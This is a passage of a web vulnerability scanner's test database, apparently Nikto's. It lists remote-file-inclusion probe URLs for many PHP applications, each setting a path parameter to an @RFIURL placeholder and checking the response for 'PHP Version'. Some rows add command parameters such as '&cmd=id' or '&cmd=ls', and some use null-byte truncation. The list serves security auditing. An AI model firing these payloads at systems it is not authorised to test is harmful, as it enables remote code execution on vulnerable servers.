"003926","5292","c","/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003927","5292","c","/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003928","5292","c","/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003929","5292","c","/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003930","5292","c","/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003931","5292","c","/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003932","5292","c","/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003933","5292","c","/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003934","5292","c","/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003935","5292","c","/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003936","5292","c","/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003937","5292","c","/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003938","5292","c","/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003939","5292","c","/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003940","5292","c","/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003941","5292","c","/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003942","5292","c","/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=@RFIURL?admin","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003943","5292","c","/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003944","5292","c","/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003945","5292","c","/CheckUpload.php?Language=@RFIURL&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003946","5292","c","/Contenido_4.8.4/contenido/backend_search.php?contenido_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003947","5292","c","/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003948","5292","c","/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003949","5292","c","/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003950","5292","c","/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003951","5292","c","/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003952","5292","c","/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003953","5292","c","/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003954","5292","c","/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003955","5292","c","/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003956","5292","c","/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003957","5292","c","/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003958","5292","c","/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003959","5292","c","/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003960","5292","c","/CoupleDB.php?Parametre=0&DataDirectory=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003961","5292","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003962","5292","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003963","5292","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003964","5292","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003965","5292","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003966","5292","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003967","5292","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003968","5292","c","/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003969","5292","c","/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003970","5292","c","/DON3/applications/frontpage.don3app/frontpage.php?app_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003971","5292","c","/Dir_phNNTP/article-raw.php?file_newsportal=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003972","5292","c","/DynaTracker_v151/action.php?base_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003973","5292","c","/DynaTracker_v151/includes_handler.php?base_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003974","5292","c","/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003975","5292","c","/Ex/modules/threadstop/threadstop.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003976","5292","c","/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003977","5292","c","/Exophpdesk_PATH/pipe.php?lang_file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003978","5292","c","/FirstPost/block.php?Include=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003979","5292","c","/Flickrclient.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003980","5292","c","/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003981","5292","c","/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003982","5292","c","/Full_Release/include/body_comm.inc.php?content=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003983","5292","c","/Gallery/displayCategory.php?basepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003984","5292","c","/Include/lib.inc.php3?Include=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003985","5292","c","/Include/variables.php3?Include=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003986","5292","c","/Jobline/admin.jobline.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003987","5292","c","/ListRecords.php?lib_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003988","5292","c","/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003989","5292","c","/MOD_forum_fields_parse.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003990","5292","c","/Mamblog/admin.mamblog.php?cfgfile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003991","5292","c","/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003992","5292","c","/NuclearBB/tasks/send_queued_emails.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003993","5292","c","/NuclearBB/tasks/send_queued_emails.php?root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003994","5292","c","/OpenSiteAdmin/indexFooter.php?path=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003995","5292","c","/OpenSiteAdmin/pages/pageHeader.php?path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003996","5292","c","/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003997","5292","c","/OpenSiteAdmin/scripts/classes/FieldManager.php?path=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003998","5292","c","/OpenSiteAdmin/scripts/classes/Filter.php?path=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003999","5292","c","/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004000","5292","c","/OpenSiteAdmin/scripts/classes/Form.php?path=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004001","5292","c","/OpenSiteAdmin/scripts/classes/FormManager.php?path=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004002","5292","c","/OpenSiteAdmin/scripts/classes/LoginManager.php?path=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004003","5292","c","/PHP/includes/header.inc.php?root=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004004","5292","c","/PHPDJ_v05/dj/djpage.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004005","5292","c","/PHPDJ_v05/dj/djpage.php?page=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004006","5292","c","/PaTh/index.php?rootpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004007","5292","c","/Path_Script/createurl.php?formurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004008","5292","c","/PhotoCart/adminprint.php?admin_folder=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004009","5292","c","/Picssolution/install/config.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004010","5292","c","/Picssolution/install/config.php?path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004011","5292","c","/RGboard/include/footer.php?_path[counter]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004012","5292","c","/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004013","5292","c","/SQuery/lib/gore.php?libpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004014","5292","c","/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004015","5292","c","/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004016","5292","c","/ScriptPage/source/includes/load_forum.php?mfh_root_path=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004017","5292","c","/ScriptPath/footers.php?tinybb_footers=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004018","5292","c","/ScriptPath/index.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004019","5292","c","/Script_Path/config.inc.php?_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004020","5292","c","/Scripts/app_and_readme/navigator/index.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004021","5292","c","/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004022","5292","c","/Somery/team.php?checkauth=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004023","5292","c","/Upload/install.php?skindir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004024","5292","c","/Widgets/Base/Footer.php?sys_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004025","5292","c","/Widgets/Base/widget.BifContainer.php?sys_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004026","5292","c","/Widgets/Base/widget.BifRoot.php?sys_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004027","5292","c","/Widgets/Base/widget.BifRoot2.php?sys_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004028","5292","c","/Widgets/Base/widget.BifRoot3.php?sys_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004029","5292","c","/Widgets/Base/widget.BifWarning.php?sys_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004030","5292","c","/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004031","5292","c","/[path]/mybic_server.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004032","5292","c","/[path]/previewtheme.php?theme=1&inc_path=@RFIURL?cmd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004033","5292","c","/_administration/securite.php?cfg[document_uri]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004034","5292","c","/_blogadata/include/struct_admin.php?incl_page=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004035","5292","c","/_conf/_php-core/common-tpl-vars.php?admindir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004036","5292","c","/_connect.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004037","5292","c","/_friendly/core/data/_load.php?friendly_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004038","5292","c","/_friendly/core/data/yaml.inc.php?friendly_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004039","5292","c","/_friendly/core/display/_load.php?friendly_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004040","5292","c","/_friendly/core/support/_load.php?friendly_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004041","5292","c","/_functions.php?prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004042","5292","c","/_includes/settings.inc.php?approot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004043","5292","c","/_theme/breadcrumb.php?rootBase=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004044","5292","c","/_wk/wk_lang.php?WK[wkPath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004045","5292","c","/abf_js.php?abs_pfad=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004046","5292","c","/about.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004047","5292","c","/about.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004048","5292","c","/aboutinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004049","5292","c","/acc.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004050","5292","c","/access/login.php?path_to_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004051","5292","c","/account.php?insPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004052","5292","c","/accsess/login.php?path_to_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004053","5292","c","/active/components/xmlrpc/client.php?c[components]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004054","5292","c","/ad_main.php?_mygamefile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004055","5292","c","/add.cgi.php?blog_theme=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004056","5292","c","/add_link.php?blog_theme=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004057","5292","c","/addpost_newpoll.php?addpoll=preview&thispath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004058","5292","c","/addressbook.php?GLOBALS[basedir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004059","5292","c","/addsite.php?returnpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004060","5292","c","/addvip.php?msetstr[\"PROGSDIR\"]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004061","5292","c","/adm/krgourl.php?DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004062","5292","c","/adm/my_statistics.php?DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004063","5292","c","/admin.loudmouth.php?mainframe=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004064","5292","c","/admin.php?Madoa=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004065","5292","c","/admin.php?cal_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
